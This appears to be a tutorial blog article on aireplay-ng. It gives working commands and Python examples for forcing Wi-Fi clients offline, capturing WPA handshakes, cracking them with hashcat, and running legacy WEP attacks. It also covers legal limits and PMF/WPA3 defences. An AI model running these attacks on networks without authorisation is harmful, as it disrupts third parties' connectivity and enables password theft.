aireplay-ng Explained — The Packet-Injection Tool of the aircrack-ng Suite

approx. 18 min read · 2026-06-08

aireplay-ng is the packet-injection tool of the aircrack-ng suite. Within the suite it owns the single job of "transmitting frames into the air." Its work splits into two parts: (1) generating and replaying traffic to accelerate WEP key recovery, and (2) deauthenticating (forcibly disconnecting) clients to force a WPA/WPA2 4-way handshake capture. The captured handshake is recorded by airodump-ng, then cracked offline by aircrack-ng / hashcat — aireplay-ng is the detonator that makes a client "drop and reconnect." It requires monitor mode (set up with airmon-ng) and an adapter that supports packet injection. Attack modes are chosen with the number flags -0 through -9.

▸ For security beginners — just these three first

It looks complex, but the essence is three things. (1) aireplay-ng is the "frame sender" of the aircrack-ng suite. Scanning is airodump-ng, cracking is aircrack-ng, and transmitting is aireplay-ng — the roles are split. (2) The most-used mode is -0 (deauth) = disconnect a client once so it reconnects, and capture the WPA handshake at that moment. (3) Firing at someone else's Wi-Fi is, in Japan, a violation of the Radio Act Article 109 (radio interference) and the Unauthorised Computer Access Act. Practice only on your own AP / an authorized pentest target / a lab. Build on this and open each chapter in turn.

01

What aireplay-ng is — the suite's injector

aircrack-ng is not a single tool but a collection of commands (a suite) that divides up wireless auditing. Within it, aireplay-ng specializes in one thing: injecting frames into the air.

Suite tool    | Role
airmon-ng     | Switch the wireless interface into monitor mode
airodump-ng   | Scan nearby APs / clients and capture/record handshakes etc.
aireplay-ng   | Inject frames (this article): deauth / replay / injection test
aircrack-ng   | Crack captured WPA handshakes / WEP IVs offline

aireplay-ng is not a tool that "takes" something, but one that "causes" something. Deauthing a client causes a reconnection, which airodump-ng records. Injecting ARP into WEP increases traffic, which builds up IVs. In other words, aireplay-ng supplies the "fuel" that makes airodump-ng (capture) and aircrack-ng (analysis) effective.

▸ Relation to wifite — it calls this automatically

wifite, which fully automates Wi-Fi attacks, internally calls aireplay-ng to deauth clients and trigger handshake captures. Rather than using wifite as a "convenient but opaque" box, understanding what aireplay-ng's -0 does lets you drop down to the manual tool and diagnose the cause when wifite stalls. See the wifite explainer for details.

02

Prerequisites — monitor mode and an injection-capable adapter

To run aireplay-ng you need two things: (1) put the wireless interface into monitor mode, and (2) use an adapter that supports packet injection.

A wireless card in normal (Managed) mode handles "only frames addressed to itself," but in monitor mode it can observe every frame in the air and transmit arbitrary frames. The tool that sets this up is airmon-ng.

Enable monitor mode
$ sudo airmon-ng check kill          # stop interfering processes (NetworkManager / wpa_supplicant); your normal Wi-Fi is down until you stop monitor mode
$ sudo airmon-ng start wlan0         # → a monitor-mode interface is created, normally named wlan0mon
$ iw dev wlan0mon info | grep type   # check: should print "type monitor"
# from here, aireplay-ng's last argument is wlan0mon (the monitor IF)
# when done: sudo airmon-ng stop wlan0mon && sudo systemctl start NetworkManager
▸ Hardware requirement — an injection-capable chip is a must

Because aireplay-ng is a tool that "sends" frames, you need not just monitor mode but an adapter that supports packet injection. Many laptop built-in Wi-Fi chips do not support injection. Common chips include the Atheros AR9271 (TP-Link TL-WN722N v1) and the Realtek RTL8812AU (5GHz-capable). Before firing anything, always confirm with an injection test (-9) whether the card can actually inject (see later chapters).

03

Legal and ethical considerations — read this first

aireplay-ng actually transmits radio and forcibly disconnects (deauths) other people's clients. Precisely because it runs so easily, you must clear the legal bar first. Performing packet injection or deauth against someone else's Wi-Fi without permission can be a clearly illegal act in Japan.

▸ Targets you may use aireplay-ng against
  • APs / home LANs you own or administer — a router you bought and set up, an isolated learning lab.
  • Targets you have explicit written permission for — a pentest or wireless-assessment contract where the scope (target SSIDs, period, techniques) is documented.
  • Legitimate learning platforms / hardware labs — a test AP you stood up yourself, where the owner permits it.

aireplay-ng's -0 (Broadcast Deauth) can disconnect even unrelated clients in range. Even "just trying it" in a cafe or apartment can mean Radio Act Article 109 (transmitting radio with the intent to interfere with others' communications = radio interference) or the Unauthorised Computer Access Act, and — if you go as far as an Evil Twin — obstruction of business. For the details of the legal status of deauth, see the Deauthentication Attack explainer. Always confirm the target and your authorization first.

04

The attack modes — selected by number flag

aireplay-ng's attack modes are selected by a number flag; each also has a long-form alias, listed in the table. In practice today almost everything is -0 and -9; -1 through -5 are relics of the WEP era but are useful for understanding the mechanics. (-6 --caffe-latte, -7 --cfrag and -8 --migmode also exist; they are likewise WEP-era, client-side attacks and are not covered here.)

Mode | Alias         | What it does                                                       | Main use
-0   | --deauth      | Send a given number of deauths (0 = send continuously)             | Current: WPA handshake capture / DoS
-1   | --fakeauth    | Establish a fake authentication with the AP (associate your card)  | WEP: make the AP accept injected frames
-2   | --interactive | Interactively choose a captured frame to replay                    | WEP: re-inject an arbitrary frame
-3   | --arpreplay   | Capture an ARP request and re-inject it to generate many IVs       | WEP acceleration (classic)
-4   | --chopchop    | KoreK chopchop: decrypt a WEP packet without the key               | WEP
-5   | --fragment    | Fragmentation attack: obtain PRGA keystream                        | WEP
-9   | --test        | Injection test: verify the card can inject and reach the AP        | Sanity check: run first

To specify targets and options, you use flags common across modes. They are easy to confuse, so keep their roles distinct.

Flag             | Meaning
-a <BSSID>       | The AP's MAC address (BSSID)
-c <CLIENT MAC>  | The target client's MAC (targeted deauth; omit it for a broadcast deauth of all clients)
-b <BSSID>       | BSSID used as a filter in the replay modes (-3/-4/-5)
-h <SOURCE MAC>  | The source MAC to transmit from (usually your card's MAC, or an associated client)
-e <ESSID>       | The target network name (fakeauth needs it when the AP's SSID is hidden)
-x <pps>         | Cap on packets per second (rate control: be gentle, avoid flooding)
Last argument    | Always the monitor-mode interface (e.g. wlan0mon)
05

In practice — WPA handshake capture (-0) and injection test (-9)

The lead role today is the attack on WPA/WPA2. The pre-shared key itself is never transmitted, so you cannot lift it from the air; but the 4-way handshake carries the nonces and a MIC computed from the key, which is enough to verify password guesses offline. The path is therefore: disconnect a connected client once → capture the 4-way handshake on auto-reconnect → crack offline with a dictionary/GPU. What causes that "disconnect" is -0 (deauth). Note that this only works if a client is connected at the time; an AP with no clients has nobody to reconnect.

First, the injection test (-9)

Before firing anything, confirm the card can actually inject and that your radio reaches the target AP.

Injection test
$ sudo aireplay-ng -9 wlan0mon                                   # probe every AP in range
$ sudo aireplay-ng -9 -e <ESSID> -a AA:BB:CC:DD:EE:FF wlan0mon   # or test against one specific AP
# "Injection is working!" plus per-AP reply ratios (e.g. "30/30: 100%") means injection is OK
# if it fails here, suspect the adapter / driver / distance before anything else

The practical WPA handshake-capture flow

Use two terminals. Terminal 1 captures (airodump-ng), terminal 2 injects deauths (aireplay-ng).

Terminal 1 — lock the channel and capture
$ sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w cap wlan0mon
# -c 6      lock to the target AP's channel (aireplay-ng on the same interface must be on this channel too)
# --bssid   the target AP's BSSID
# -w cap    save to cap-01.cap; "WPA handshake: AA:BB:CC:DD:EE:FF" in the top status line means success
Terminal 2 — targeted deauth of one client
$ sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -0 5   send 5 deauth bursts (each burst is 64 directed frames to the client and 64 to the AP; use 0 for continuous)
# -a     the target AP's BSSID
# -c     the target client's MAC (omit to broadcast to all clients)
# → the client drops and reconnects → handshake lands in cap-01.cap
# if aireplay-ng complains that wlan0mon is on a different channel than the AP, fix the channel first; it will not inject otherwise
▸ The field move — a few targeted shots are enough

Rather than continuously broadcast-deauthing everyone (omitting -c), it is better to fire just a few shots at one connected client by specifying -c; that reduces both the collateral on unrelated devices (= legal risk) and detection. The handshake is captured the moment a single reconnect occurs, so there is no need to flood. Before packing up, confirm you actually have it: aircrack-ng cap-01.cap lists the network with "(1 handshake)" if the capture is usable. Then move to offline analysis with aircrack-ng -w wordlist.txt cap-01.cap, or convert with hcxpcapngtool -o cap.22000 cap-01.cap and run hashcat -m 22000 cap.22000 wordlist.txt. The mechanics of deauth itself are detailed in the Deauthentication Attack explainer.
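Choosing the one client to put in -c is the step the commands above leave to the operator. The following is an added example, not code from the original article or from the aircrack-ng project: it parses the CSV that airodump-ng writes next to cap-01.cap (the AP table, a blank line, then the station table) and turns it into the two command lines of the flow above, picking the associated client with the most traffic. The CSV content, MAC addresses and ESSIDs are constructed for the example; the column names are airodump-ng's own.

```python
import csv
import shlex

# Constructed sample of airodump-ng's cap-01.csv: AP block, blank line, station block.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key

AA:BB:CC:DD:EE:FF, 2026-06-08 10:00:00, 2026-06-08 10:05:00,  6,  54, WPA2, CCMP, PSK, -40,      120,        0,   0.  0.  0.  0,   6, LabNet,
AA:BB:CC:DD:EE:01, 2026-06-08 10:00:00, 2026-06-08 10:05:00, 11,  54, WPA2, CCMP, PSK, -75,       60,        0,   0.  0.  0.  0,   5, Other,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
11:22:33:44:55:66, 2026-06-08 10:00:05, 2026-06-08 10:05:00, -50,      310, AA:BB:CC:DD:EE:FF,
77:88:99:AA:BB:CC, 2026-06-08 10:01:00, 2026-06-08 10:04:00, -70,       12, AA:BB:CC:DD:EE:FF, LabNet
DE:AD:BE:EF:00:01, 2026-06-08 10:02:00, 2026-06-08 10:02:30, -80,        3, (not associated), Guest
"""


def parse_airodump_csv(text):
    """Return (aps, stations) as lists of dicts keyed by airodump-ng's column names."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    split = next(i for i, ln in enumerate(lines) if ln.startswith("Station MAC"))

    def rows(chunk):
        parsed = list(csv.reader(chunk, skipinitialspace=True))
        header = [h.strip() for h in parsed[0]]
        return [dict(zip(header, [c.strip() for c in row])) for row in parsed[1:]]

    return rows(lines[:split]), rows(lines[split:])


def plan_targeted_deauth(csv_text, bssid, iface="wlan0mon", count=5):
    """Pick the busiest client associated with `bssid` and build the capture + deauth commands.

    Returns None when no client is associated: a deauth cannot trigger a reconnect
    (and thus no handshake) if nobody is connected, so there is no point firing.
    """
    aps, stations = parse_airodump_csv(csv_text)
    ap = next((a for a in aps if a["BSSID"] == bssid), None)
    if ap is None:
        raise ValueError(f"{bssid} is not in the capture")
    # Stations listed as "(not associated)" never match the BSSID and are skipped automatically.
    clients = sorted((s for s in stations if s["BSSID"] == bssid),
                     key=lambda s: int(s["# packets"]), reverse=True)
    if not clients:
        return None
    client = clients[0]["Station MAC"]
    return {
        "channel": ap["channel"],
        "client": client,
        "airodump": ["airodump-ng", "-c", ap["channel"], "--bssid", bssid, "-w", "cap", iface],
        "aireplay": ["aireplay-ng", "-0", str(count), "-a", bssid, "-c", client, iface],
    }


if __name__ == "__main__":
    plan = plan_targeted_deauth(SAMPLE_CSV, "AA:BB:CC:DD:EE:FF")
    print("terminal 1:", shlex.join(plan["airodump"]))
    print("terminal 2:", shlex.join(plan["aireplay"]))
```

In a real run the CSV keeps being rewritten while airodump-ng is capturing, so read it once the station list has settled; the "# packets" column is a reasonable proxy for "a client that is actually talking and will reconnect quickly".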

06

Legacy WEP attacks (-1 / -3)

-1 through -5 are the modes for breaking WEP (Wired Equivalent Privacy). WEP prepends a 24-bit IV (initialization vector) to the shared key and feeds the result to RC4. Because the IV is so short it repeats, and because RC4's key scheduling leaks information about the first key bytes, the key can be recovered statistically (FMS/KoreK, and today PTW) once enough IVs are collected. The catch is that on a quiet AP IVs never accumulate, so aireplay-ng artificially generates traffic to accelerate IV collection. WEP APs are essentially nonexistent today, so treat this as a historical, educational subject.

A typical WEP attack is the two-step fakeauth to associate with the AP (-1) → ARP replay to mass-produce IVs (-3).

1. Associate with the AP via fakeauth (-1)
The AP ignores frames from an "unauthenticated source." With -1 you associate your card via a fake authentication, laying the groundwork for the AP to accept your injected frames.
2. Mass-produce IVs with ARP replay (-3)
Capture one ARP request on the network and re-inject it rapidly. Each AP response creates a fresh IV, and airodump-ng's #Data climbs fast.
3. Recover the key with aircrack-ng
Once enough IVs (tens of thousands+) accumulate, aircrack-ng cap-01.cap recovers the WEP key statistically in minutes.
WEP — fakeauth and ARP replay
# (1) associate with the AP via fakeauth (-1 0 = immediate, no re-association delay)
$ sudo aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
# -h is your own card's MAC (the source)
# (2) capture an ARP request and re-inject it → mass-produce IVs
$ sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon
# -b is the target AP's BSSID (the replay filter)
▸ -2 / -4 / -5 are also for WEP

-2 (interactive) replays a captured frame you pick interactively; -4 (chopchop) and -5 (fragment) are advanced WEP attacks that extract keystream or packet contents without knowing the key. All exploit WEP's structural flaws and do not work against WPA2/WPA3. WEP has long been deprecated, so think of these as teaching material for "why WEP collapsed."
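The two WEP mechanics the chapter describes (ARP replay to multiply IVs, and keystream recovery without the key, which is what chopchop and fragmentation build on) can be shown end to end in a few lines. The following is an added example, not code from the original article or from aircrack-ng: a textbook RC4 and WEP encryption routine, a constructed stand-in AP that answers every replayed ARP request under a fresh IV, and the known-plaintext trick that recovers the keystream for one IV from the fixed LLC/SNAP header every ARP frame begins with. The WEP key, the frame contents and the AP model are constructed; the statistical key-recovery step (PTW) is not implemented here, only the IV collection and keystream reuse it depends on.

```python
import struct
import zlib


def rc4(key: bytes, n: int) -> bytes:
    """Plain RC4 (KSA + PRGA), the stream cipher WEP wraps; returns n keystream bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: 3-byte IV in the clear, key-id byte, then RC4(IV||key) XOR (data||CRC32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    keystream = rc4(iv + wep_key, len(plaintext) + 4)
    return iv + b"\x00" + xor(plaintext + icv, keystream)


# LLC/SNAP header every ARP frame on 802.11 starts with: the attacker's known plaintext.
SNAP_ARP = bytes.fromhex("aaaa030000000806")
SNAP_IP = bytes.fromhex("aaaa030000000800")


class WepAccessPoint:
    """Constructed stand-in for the AP: re-encrypts an ARP reply under a new IV for every request."""

    def __init__(self, wep_key: bytes):
        self.key = wep_key
        self.iv_counter = 0

    def next_iv(self) -> bytes:
        iv = struct.pack("<I", self.iv_counter)[:3]          # 24-bit IV: wraps after 2**24 frames
        self.iv_counter = (self.iv_counter + 1) % (1 << 24)
        return iv

    def reply_to_arp(self, encrypted_request: bytes) -> bytes:
        # WEP has no replay protection: the AP answers the same request every time.
        reply = SNAP_ARP + b"\x00\x01\x08\x00\x06\x04\x00\x02" + bytes(20)
        return wep_encrypt(self.key, self.next_iv(), reply)


def arp_replay(ap: WepAccessPoint, captured_request: bytes, rounds: int) -> set:
    """What -3 does: re-inject one captured ARP request and collect the IVs of the answers."""
    ivs = set()
    for _ in range(rounds):
        ivs.add(ap.reply_to_arp(captured_request)[:3])
    return ivs


def recover_keystream(frame: bytes, known_plaintext: bytes = SNAP_ARP):
    """IV and keystream prefix of one frame, from known plaintext alone (no key needed)."""
    iv, body = frame[:3], frame[4:]
    return iv, xor(body[: len(known_plaintext)], known_plaintext)


def decrypt_with_keystream(frame: bytes, iv: bytes, keystream: bytes) -> bytes:
    """Any other frame encrypted under the same IV leaks its first len(keystream) bytes."""
    if frame[:3] != iv:
        raise ValueError("keystream belongs to a different IV")
    return xor(frame[4:4 + len(keystream)], keystream)


if __name__ == "__main__":
    key = bytes.fromhex("0102030405060708090a0b0c0d")        # constructed 104-bit WEP key
    ap = WepAccessPoint(key)
    request = wep_encrypt(key, ap.next_iv(), SNAP_ARP + bytes(28))
    print("unique IVs after 5000 replays:", len(arp_replay(ap, request, 5000)))
    iv, ks = recover_keystream(request)
    print("keystream for IV", iv.hex(), "=", ks.hex())
```

Two things the run makes concrete: every replayed request yields a reply under a new IV, which is exactly the #Data counter climbing in airodump-ng; and eight bytes of keystream fall out of a single frame because the plaintext prefix is public, which is why WEP's keystream can be extended (-4/-5) and reused without ever learning the key.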

07

Where it sits in the suite, and being neutralized by PMF

aireplay-ng is not self-contained. Within the flow airmon-ng → airodump-ng → aireplay-ng → aircrack-ng, it is the single step that handles injection.

Step                | Tool                   | What it does
1. Prep             | airmon-ng              | Monitor mode (wlan0 → wlan0mon)
2. Recon            | airodump-ng            | Identify BSSID / channel / clients and start capturing
3. Inject           | aireplay-ng            | -0 to deauth, or -1/-3 to accelerate WEP
4. Analyze          | aircrack-ng / hashcat  | Crack the handshake / IVs offline
(fully automated)   | wifite                 | Bundles all of the above into one command
▸ PMF (802.11w) / WPA3 neutralizes -0

aireplay-ng's -0 relies on the historical 802.11 flaw that deauth and disassoc management frames are sent in plaintext and unauthenticated, so anyone who knows the AP's and client's MAC addresses can spoof them. On a link where PMF (Protected Management Frames, 802.11w) has been negotiated, unicast deauths are encrypted like data frames and broadcast ones carry a BIP MIC keyed with the IGTK; a forged plaintext deauth fails that check and the client simply ignores it. WPA3 makes PMF mandatory, so a forced handshake capture via -0 generally does not work against a WPA3 network. Two caveats for the assessor: WPA2 APs can enable PMF as well (802.11w is optional there, and many do), and when an AP only advertises PMF as "capable" rather than "required", a client that did not negotiate it is still deauthable. The Deauthentication Attack explainer covers in detail why PMF neutralizes it, all the way to the defender's configuration.
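What -0 actually puts on the air, why PMF stops it, and what a defender can count are all visible in the frame bytes. The following is an added example, not code from the original article or from aircrack-ng: it builds the unprotected 802.11 deauthentication frame a spoofing tool sends (24-byte management header plus a 2-byte reason code), models one "-0 <count>" as 64 directed frames to the client and 64 to the AP (an assumption drawn from how aireplay-ng reports "Sending 64 directed DeAuth (code 7)"), parses the frames back, and applies two rules: a PMF client drops any deauth whose Protected Frame bit is clear, and a WIDS can count unprotected deauths per BSSID. The BIP MIC that PMF attaches to broadcast deauths is not modelled; the MACs are constructed.

```python
import struct
from collections import Counter

TYPE_MGMT = 0
SUBTYPE_DEAUTH = 12
FLAG_PROTECTED = 0x40      # "Protected Frame" bit in the second frame-control byte
REASON_CLASS3 = 7          # reason code 7; assumption: the value aireplay-ng's deauth template uses
DURATION = 0x013A          # duration field seen in aireplay-ng's template (c0 00 3a 01 ...); assumption


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst: str, src: str, bssid: str, seq: int, reason: int = REASON_CLASS3) -> bytes:
    """Unprotected deauth frame: no key material is involved, only three MACs and a reason code."""
    fc0 = (TYPE_MGMT << 2) | (SUBTYPE_DEAUTH << 4)                  # 0xC0
    header = struct.pack("<BBH6s6s6sH", fc0, 0, DURATION,
                         mac_bytes(dst), mac_bytes(src), mac_bytes(bssid), (seq & 0xFFF) << 4)
    return header + struct.pack("<H", reason)


def parse_mgmt(frame: bytes) -> dict:
    """Decode the management header; the reason code is only readable when the body is not encrypted."""
    fc0, flags, _dur, a1, a2, a3, seqctl = struct.unpack_from("<BBH6s6s6sH", frame, 0)
    info = {"type": (fc0 >> 2) & 3, "subtype": fc0 >> 4, "protected": bool(flags & FLAG_PROTECTED),
            "dst": mac_str(a1), "src": mac_str(a2), "bssid": mac_str(a3), "seq": seqctl >> 4, "reason": None}
    if info["type"] == TYPE_MGMT and info["subtype"] == SUBTYPE_DEAUTH and not info["protected"]:
        info["reason"] = struct.unpack_from("<H", frame, 24)[0]
    return info


def simulate_aireplay_deauth(ap: str, client: str, count: int) -> list:
    """-0 <count>: each count is modelled as 64 frames to the client (as the AP) and 64 to the AP (as the client)."""
    frames, seq = [], 0
    for _ in range(count):
        for _ in range(64):
            frames.append(build_deauth(client, ap, ap, seq)); seq += 1
            frames.append(build_deauth(ap, client, ap, seq)); seq += 1
    return frames


def client_accepts(frame: bytes, pmf_required: bool) -> bool:
    """Receiver rule: with PMF negotiated, an unprotected deauth is discarded instead of acted on."""
    p = parse_mgmt(frame)
    return True if not pmf_required else p["protected"]


def unprotected_deauths_per_bssid(frames: list) -> Counter:
    """Detection: unprotected deauth frames grouped by BSSID (a burst of hundreds is the -0 signature)."""
    counts = Counter()
    for f in frames:
        p = parse_mgmt(f)
        if p["type"] == TYPE_MGMT and p["subtype"] == SUBTYPE_DEAUTH and not p["protected"]:
            counts[p["bssid"]] += 1
    return counts


if __name__ == "__main__":
    frames = simulate_aireplay_deauth("aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66", 5)
    print("first frame:", frames[0].hex())
    print("per-BSSID unprotected deauths:", dict(unprotected_deauths_per_bssid(frames)))
    print("legacy client disconnects:", client_accepts(frames[0], pmf_required=False))
    print("PMF client disconnects:   ", client_accepts(frames[0], pmf_required=True))
```

The point of the two rules is the asymmetry: the attacker's frame is 26 bytes of public information, so the only thing that can stop it is the receiver refusing unauthenticated management frames, which is exactly what PMF adds; and because the spoofed frames name the AP in addr3, a monitor on the same channel can attribute the burst to the BSSID under attack even though the source MAC is forged.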

▸ Bottom line — aireplay-ng is the "causer"

aireplay-ng is the injector of the aircrack-ng suite: for WPA it uses -0 to drop a client so the handshake is captured; for WEP it uses -1/-3 to mass-produce traffic and build up IVs. Confirm injection with -9 before firing anything, and keep deauth to a few targeted shots. And firing at someone else's Wi-Fi is a violation of Radio Act Article 109 / the Unauthorised Computer Access Act — practice only on your own AP or an authorized pentest target. Once you understand the mechanics, using its automated form, wifite, makes the whole picture clear.
